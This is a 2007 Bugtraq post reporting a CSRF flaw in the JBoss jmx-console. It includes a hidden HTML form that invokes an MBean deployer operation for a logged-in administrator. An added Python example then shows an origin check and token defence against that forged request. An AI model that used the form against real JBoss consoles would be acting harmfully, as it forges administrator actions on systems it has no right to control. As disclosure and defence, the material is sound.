| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | JBoss jmx-console CSRF |
| From: | buben.razuma@gmail.com |
| Date: | 22 Feb 2007 11:04:20 -0000 |
Hello!

A recent message about JBoss's console made me look at that interface again, and it seems that it is vulnerable to CSRF attacks. MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by submitting a hidden form like the following:

```html
<form method="post" action="http://host:port/jmx-console/HtmlAdaptor">
  <input type="hidden" name="action" value="invokeOp">
  <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer">
  <input type="hidden" name="methodIndex" value="0">
  <input type="submit" value="Invoke">
</form>
```

Please correct me if I'm wrong.

Best regards,
B.R.
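The post describes the classic CSRF condition: the console accepts a state-changing POST from any page the administrator's browser happens to load, because the browser attaches the admin's session cookie automatically. The block below is an added example (not code from the post or from JBoss) showing the two server-side checks that close that gap for an endpoint like `/jmx-console/HtmlAdaptor`: a same-origin check on the `Origin`/`Referer` header and a per-session synchronizer token carried in a hidden form field. The `Request` model, the `csrf_token` field name and the `http://jboss.internal:8080` site origin are assumptions for the example; the forged request uses the exact form fields quoted in the post.

```python
"""CSRF guard for a state-changing admin endpoint (added example, not JBoss code)."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Methods that must never change state; every other method needs both checks.
SAFE_METHODS = frozenset({"GET", "HEAD", "OPTIONS"})

# Assumed deployment values for the example.
SITE_ORIGIN = "http://jboss.internal:8080"
CONSOLE_PATH = "/jmx-console/HtmlAdaptor"
TOKEN_FIELD = "csrf_token"  # hypothetical hidden-field name


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request to the console."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    # Token the server issued to the authenticated session (None = no session).
    session_token: Optional[str] = None


def issue_token() -> str:
    """Per-session token to embed as a hidden field in the console's own forms."""
    return secrets.token_urlsafe(32)


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def request_origin(headers: dict) -> Optional[str]:
    """Browser-asserted source: Origin preferred, Referer as fallback, else None."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("origin") and h["origin"] != "null":
        return _origin_of(h["origin"])
    if h.get("referer"):
        return _origin_of(h["referer"])
    return None


def csrf_check(req: Request, site_origin: str = SITE_ORIGIN) -> tuple:
    """Return (allowed, reason). Both checks must pass for a non-safe method:
    1. the request originates from our own site, and
    2. the form carries the token bound to this session (synchronizer token).
    A cross-site form post fails (1) even though the session cookie is present,
    and a post from our own origin without the hidden token fails (2)."""
    if req.method.upper() in SAFE_METHODS:
        return True, "safe method"
    origin = request_origin(req.headers)
    if origin is None:
        return False, "no Origin/Referer on state-changing request"
    if origin != site_origin.lower():
        return False, f"cross-site origin {origin}"
    if req.session_token is None:
        return False, "no authenticated session"
    submitted = req.form.get(TOKEN_FIELD, "")
    if not hmac.compare_digest(submitted.encode(), req.session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def demo() -> dict:
    """Constructed requests: the post's hidden form, plus legitimate use."""
    token = issue_token()
    invoke_op = {"action": "invokeOp",
                 "name": "jboss.j2ee:service=EARDeployer",
                 "methodIndex": "0"}
    # Victim's browser submits the attacker page's form; the cookie (and so the
    # session token) rides along, but the Referer points at the foreign page.
    forged = Request("POST", CONSOLE_PATH,
                     {"Referer": "http://attacker.example/page.html"},
                     dict(invoke_op), session_token=token)
    # Same forged post with the Referer stripped by a referrer policy.
    forged_no_ref = Request("POST", CONSOLE_PATH, {}, dict(invoke_op),
                            session_token=token)
    # Admin clicks Invoke in the real console: own origin plus the hidden token.
    legit = Request("POST", CONSOLE_PATH, {"Origin": SITE_ORIGIN},
                    {**invoke_op, TOKEN_FIELD: token}, session_token=token)
    # Own origin but a stale/wrong token (e.g. replayed from another session).
    stale = Request("POST", CONSOLE_PATH, {"Origin": SITE_ORIGIN},
                    {**invoke_op, TOKEN_FIELD: issue_token()}, session_token=token)
    read_only = Request("GET", CONSOLE_PATH, {}, {}, session_token=token)
    return {"forged": csrf_check(forged), "forged_no_ref": csrf_check(forged_no_ref),
            "legit": csrf_check(legit), "stale": csrf_check(stale),
            "read_only": csrf_check(read_only)}


if __name__ == "__main__":
    for name, (allowed, reason) in demo().items():
        print(f"{name:14s} allowed={allowed!s:5s} {reason}")
```

The origin check alone is not enough (some clients and proxies strip `Referer`, and a request with neither header is rejected here for exactly that reason), and the token alone is not enough if it ever leaks into a URL, which is why the guard insists on both. Whatever guard is used, it only helps if the console never performs changes on GET, so `SAFE_METHODS` must genuinely be safe in the deployed servlet.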